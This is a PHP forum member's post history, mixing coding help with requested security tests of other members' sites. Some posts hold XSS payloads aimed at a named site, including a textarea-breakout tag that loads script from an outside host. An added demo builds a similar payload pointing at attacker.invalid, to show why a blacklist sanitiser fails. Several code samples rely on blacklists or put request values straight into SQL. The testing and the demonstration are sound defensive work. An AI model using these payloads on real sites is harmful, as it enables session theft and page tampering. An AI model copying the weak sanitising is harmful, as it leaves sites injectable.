helraizer
Members, 401 posts

Everything posted by helraizer

  1. I'm not sure if it's an inconsistency on just this post, but you have Image.php and in the image source you're looking for image.php; I do believe it is case-sensitive. Your page is looking for http://www.penguinpolls.com/image.php but when you drag the image to the start bar you get Sam
  2. http://www.imperialized.net/view_profile.php?user[]
     XSS: http://www.imperialized.net/view_profile.php?user=%3Cmarquee%20direction=right%20behavior=alternate%3Evunerable%3C/marquee%3E
     XSS: http://www.imperialized.net/view_profile.php?user=%3Cscript%3Ealert(1);%3C/script%3E
  3. The user can't change the background, but I can, easily. In the not-so-distant future I will be developing a user system so people can get their own chatboxes (if they so desire); then there would be a choice of backgrounds for them, a word censor list, a choice of colours (depending on background image) and a choice of different fonts too, possibly other tools. Any ideas for some? Sam
  4. At the moment it is done by IP, and just in case the user uses broadband and their IP doesn't reset, they can only edit it within 72 hours. I am going to use a different way in the near future but for now it's IP. Sam
  5. Is it me or did something just happen to the forum? Some table didn't exist a second ago and now loads of posts were just deleted... Wow, this'll show my clairvoyance: KeeB, for the question you asked in the post after this one (): The idea behind it is that it is an image based chatbox that can be used as a forum signature, or other. So you can have a chat with your friends which can be then viewed outside the realms of your site. I can link it here, for instance: I've changed all the images to gif now, so they should load quicker. Before they were png. Sam
  6. I used to save to file but it made post manipulation (deletion and editing) a nightmare, so now it's all done by database. Sam
  7. Hi folks, http://www.helraizer.co.uk/mychatbox/ I just moved my chatbox to a database rather than file for ease of use and accessibility. The user now has the option to delete posts etc.. later the user will be able to edit their posts etc... I am aware that the database aspect means there are more risks, could you guys please test it out and leave feedback. I'm pretty sure it's well protected but I may have missed something. If you cannot find any risks, could you let me know also. Thanks, Sam
  8. If the message is sent to the email, use htmlspecialchars($_POST['newmessage']); which will convert " to &quot;, which will still look like " in the email but won't break it in the HTML. That, or in the PHP code you use to write the message with the ' or ", use \' or \", which should escape them. Sam
  9. To get the page inside the iframe, have your HTML set up the page and the frame as normal, then use <iframe src="<?php include ('page.dhtml'); /*or whatever*/ ?>"> or do you not want it in the iframe? In theory you can use the target element of 'a': <a href="whatever.dhtml" target="_parent">. Sam
  10. Umm.. I think you'll have to improvise on this one. There is no easy way to create arced text as a whole, as such, that I know of.. But with imagettftext: imagettftext ( resource $image , float $size , float $angle , int $x , int $y , int $color , string $fontfile , string $text ) the third element is float $angle, which you can set from 0 to 359 degrees to control which way the character faces. If you have $string, you can use str_split($string, 1) to split the string up into one-character chunks. Then use imagettftext for all of them, using a slightly different angle for each and slightly different x and y co-ords. That will give an arced effect, with experimenting. Hope that helps? Sam
  11. It's .ip because it uses the comment id and user IP to make sure they can only delete their own posts. Won't `tblip.ip` and `tblcomments.id` now look for a column called tblcomments.id rather than a column called id in tblcomments? (Hope that made some sense.) The error appears to be coming from the fact I'm using the two tables in the FROM clause, but if I take that out and leave it as: "DELETE FROM tblcomments WHERE tblcomments.id='$comment_id' AND tblip.ip = '$my_ip'" then it says . Is it possible to use INNER JOIN in a DELETE statement? Sam
  12. So that's not quite true, but still, I deleted the * from the command and now I get: Sam
  13. Hi folks, I'm moving my image based chatbox to a database system; currently I am working on the post deletion aspect of it. I have this code (MySQL connection in a separate file, working perfectly):

      delete.php5 -

      <?php
      //only using tags to get syntax highlighting.
      $sqlx = "SELECT * FROM tblcomments INNER JOIN tblip ON tblcomments.id = `tblip`.`id` ORDER BY tblcomments.`id`";
      $resultx = mysql_query($sqlx) or die("Error in part X: ".mysql_error());
      while ($row = mysql_fetch_array($resultx)) {
          $ip = $_SERVER['REMOTE_ADDR'];
          $id = $row['id'];
          if ($ip == $row['ip']) {
              $message = $row['comment'];
              echo '<table align="center"><tr><td>';
              echo '<a href="?comment_id='.$id.'">delete comment: "'.$message.'"</a>';
              echo '</td></tr></table>';
              if (isset($_GET['comment_id']) && is_numeric($_GET['comment_id'])) {
                  $comment_id = $_GET['comment_id'];
                  $my_ip = $_SERVER['REMOTE_ADDR'];
                  $sql1 = "SELECT * FROM tblcomments INNER JOIN tblattributes ON tblcomments.id = tblattributes.id INNER JOIN tblip ON tblattributes.id = tblip.id WHERE `tblcomments`.`id`='$comment_id'";
                  $result1 = mysql_query($sql1) or die("Error performing 1 :" . mysql_error());
                  while ($row = mysql_fetch_array($result1)) {
                      if ($my_ip === $row['ip'] && $comment_id === $row['id']) {
                          $comment_id = $_GET['comment_id'];
                          $my_ip = $_SERVER['REMOTE_ADDR'];
                          $sql2 = "DELETE * FROM `tblcomments`, `tblip` WHERE `tblcomments`.`id`='$comment_id' AND `tblip`.`ip`= '$my_ip'";
                          $result = mysql_query($sql2) or die("Error performing 2 :" . mysql_error());
                          die("Post deletion successful <br><br> Please click <a href='./index.php5'>here</a> to go back. <br><br> Thank you!");
                      } else {
                          $error = _NO_POST;
                          $_SESSION['post'] = $error;
                          header('Location: index.php5');
                          exit();
                      }
                  }
              } else {
                  die('<div class="ddgb_entrybox"> <table width="100%" border="0" cellspacing="8" cellpadding="0"> <tr> <td width="42%" align="right" valign="top"></td> <td align="center" valign="top"> <h2> '. _ERROR . '</h2><ul> <li> '. _MAL . '</li> </ul> <br><br><br> </td> </tr> </table> </div>');
              }
          }
      }
      ?>

      Error given:

      This corresponds to this part of the code:

      $sql2 = "DELETE * FROM `tblcomments`, `tblip` WHERE `tblcomments`.`id`='$comment_id' AND `tblip`.`ip`= '$my_ip'";
      $result = mysql_query($sql2) or die("Error performing 2 :" . mysql_error());

      For the life of me I can't work out why there is an error.. am I missing something obvious? Thanks, Sam
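The deletion logic from the post above, reworked as an added example (Python against an in-memory SQLite database, not the poster's PHP; the table contents are constructed for the demo). It keeps the same two tables keyed on the comment id, but puts the ownership test inside the DELETE itself with bound parameters, uses the affected-row count to decide whether the comment really belonged to the requester, and parses the id as a strict integer rather than with is_numeric(), which also accepts forms such as '1e1' and ' 2'.

```python
import sqlite3
from typing import List, Optional

# Constructed sample data for the demo (not the original site's database):
# two tables keyed on the same comment id, as in the post's tblcomments/tblip.
SAMPLE_ROWS = [
    (1, "first post", "203.0.113.7"),
    (2, "second post", "203.0.113.7"),
    (3, "someone else's post", "198.51.100.9"),
]


def make_db() -> sqlite3.Connection:
    """In-memory stand-in for the MySQL tables used in the post."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE tblcomments (id INTEGER PRIMARY KEY, comment TEXT NOT NULL)")
    conn.execute("CREATE TABLE tblip (id INTEGER PRIMARY KEY, ip TEXT NOT NULL)")
    for cid, text, ip in SAMPLE_ROWS:
        conn.execute("INSERT INTO tblcomments VALUES (?, ?)", (cid, text))
        conn.execute("INSERT INTO tblip VALUES (?, ?)", (cid, ip))
    conn.commit()
    return conn


def parse_comment_id(raw: str) -> Optional[int]:
    """Accept only a plain decimal id. PHP's is_numeric() would also pass
    '1e1' or ' 2'; a strict parse keeps such values out of the query."""
    return int(raw) if raw.isdecimal() else None


def delete_own_comment(conn: sqlite3.Connection, raw_id: str, requester_ip: str) -> bool:
    """Delete comment raw_id only if tblip says it was posted from requester_ip.

    The ownership check is part of the DELETE, so there is no gap between a
    SELECT-then-compare and the DELETE, and both values travel as bound
    parameters instead of being interpolated into the SQL string.
    """
    cid = parse_comment_id(raw_id)
    if cid is None:
        return False
    with conn:  # one transaction: both rows go, or neither does
        cur = conn.execute(
            "DELETE FROM tblcomments WHERE id = ? "
            "AND id IN (SELECT id FROM tblip WHERE ip = ?)",
            (cid, requester_ip),
        )
        if cur.rowcount != 1:  # no such comment, or not this requester's
            return False
        conn.execute("DELETE FROM tblip WHERE id = ? AND ip = ?", (cid, requester_ip))
    return True


def remaining_ids(conn: sqlite3.Connection) -> List[int]:
    """Comment ids still present in both tables, for checking the result."""
    rows = conn.execute(
        "SELECT c.id FROM tblcomments c JOIN tblip i ON i.id = c.id ORDER BY c.id"
    ).fetchall()
    return [r[0] for r in rows]


if __name__ == "__main__":
    db = make_db()
    print("own comment:   ", delete_own_comment(db, "1", "203.0.113.7"))
    print("someone else's:", delete_own_comment(db, "3", "203.0.113.7"))
    print("lax id '1e1':  ", delete_own_comment(db, "1e1", "203.0.113.7"))
    print("left:", remaining_ids(db))
```

The IN-subquery form is portable; on MySQL the same thing can be one multi-table statement, `DELETE c, i FROM tblcomments c JOIN tblip i ON i.id = c.id WHERE c.id = ? AND i.ip = ?`, again with placeholders rather than string interpolation. Whatever the SQL dialect, the IP is a weak ownership token: everyone behind the same NAT or proxy shares it, so a per-post secret or a session would be the thing to move to.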
  14. It depends what the use of the script is. If it has a function but does not return a value then white is good because it means it worked. If you want to see errors in your code, at the top add: error_reporting(E_ALL); ini_set("display_errors", true); That will show every type of error: Notice, Warning, Fatal etc.. Sam
  15. To protect against the XSS you can use preg_replace. preg_replace("/textarea/i","",$textarea); // so if anyone uses the word textarea in the textarea (comment) it will delete the word, so if they used </textarea> it'd just give </>. You can also use preg_replace for other things like preg_replace("/</","&lt;",$textarea); preg_replace("/>/","&gt;",$textarea); which should change </script> to &lt;/script&gt;, which will render XSS not possible.
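Post 8 above recommends htmlspecialchars() and post 15 a preg_replace() blacklist. The following is an added Python model of both, not the poster's PHP: re.sub stands in for preg_replace, html.escape for htmlspecialchars, and the comment text is constructed for the demo. It shows why the blacklist fails: a single non-recursive pass over a comment that nests the banned word inside itself leaves a working </textarea> behind, whereas encoding the structural characters makes the question of which tag names to block go away.

```python
import html
import re

# Constructed attacker input (not from the original thread): "textarea" is
# nested inside itself, so deleting the inner copy re-forms the closing tag.
NESTED_PAYLOAD = (
    '</texttextareaarea>'
    '<script src="http://attacker.invalid/xss.js"></script>'
)


def strip_textarea(comment: str) -> str:
    """Model of preg_replace("/textarea/i", "", $textarea).

    re.sub, like preg_replace, makes one non-recursive pass, so text that
    reassembles the banned word after a deletion is not caught.
    """
    return re.sub(r"textarea", "", comment, flags=re.IGNORECASE)


def escape_for_html(comment: str) -> str:
    """Model of htmlspecialchars($comment, ENT_QUOTES): encode the characters
    that can change HTML structure (& < > " ') instead of guessing tag names."""
    return html.escape(comment, quote=True)


def render_textarea(comment: str, sanitizer) -> str:
    """The <textarea> the edit form displays the comment in."""
    return "<textarea>" + sanitizer(comment) + "</textarea>"


def breaks_out(page: str) -> bool:
    """True if the page holds more closing tags than the one the template
    emits, i.e. the comment closed the textarea early and injected markup."""
    return page.lower().count("</textarea>") > 1


if __name__ == "__main__":
    for name, sanitizer in (("blacklist", strip_textarea), ("escape", escape_for_html)):
        page = render_textarea(NESTED_PAYLOAD, sanitizer)
        print(f"{name:9s} breaks out: {breaks_out(page)}")
        print("   ", page)
```

Blacklisting also has to be repeated for every tag an attacker might use (script, img, svg, event handlers); encoding at output time covers all of them with one call, and the encoded text still displays as the user typed it.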
  16. You should word wrap comments. If you look now the comments area is really wide because I said this without any spaces and it broke the formatting. Sam
  17. Uh oh! Hehehehe, looks like you've got work to do. Told you there was a flaw. =P He can easily fix it by taking the "</textarea><script src=http://www.helraizer.co.uk/xss1.js></script>" out of the code.
  18. The site is protected on the main viewing of the page, but now on editing there is a big XSS flaw. I was able to inject JavaScript from my website, which could be potentially very bad for you. Sam
  19. Cool cool. If you have any trouble post the code, we'll try and help.
  20. No problem, glad I could help. Just for information, there are these built-in PHP functions:
      is_array(); - to see if the variable is an array.
      is_bool(); - to see if the variable is a boolean (True/False).
      is_callable(); - to see if the contents of a variable can be called as a function.
      is_double() || is_float() || is_real(); - to see if the contents of a variable is a float.
      is_int() || is_integer() || is_long(); - to see if the variable is an integer (whole number).
      is_null(); - to see if a variable is null.
      is_numeric(); - to see if the variable is a number.
      is_object(); - to see if the variable is an object.
      is_resource(); - to see if the variable is a resource (like mysql_connect).
      is_scalar(); - to see if the variable is either integer, float, string or boolean.
      is_string(); - to see if the variable is a string.
      Sam
  21. The main problem is when you press Go! it says this:
  22. What code do you have around line 316? Could you please post it? From what you've said I'm guessing you could use something similar to what I've said earlier: if(is_string($activation)) { //run your code } else { //throw error. } Although that might not stop it because of mysql_real_escape_string(); you could use preg_replace("/\[\]/","",$_SERVER['PHP_SELF']); that will look in the URL (after the .com or similar extension) for any [] square brackets and delete them. The "" replaces the [] with nothing, just deletes them. That should work but you'll be left with index.php?p=act&u&id so maybe preg_replace("/\[\]/","=",$_SERVER['PHP_SELF']); which will give index.php?p=act&u=&id= Sam
  23. It doesn't give you any errors but it does say "Page 7 of 2" or "page 3000625 of 2", which doesn't really look too professional. Say you're using switch($page) { case 1 : $page_to_display = "www.mysite.com/page1"; break; case 2 : $page_to_display = "www.mysite.com/page2"; break; default : $page_to_display = "www.mysite.com/page1"; break; } you should add this code before the switch statement: if($page == 1 || $page == 2) { //switch statement } else { //throw them an error saying "Invalid page number" or similar } Sam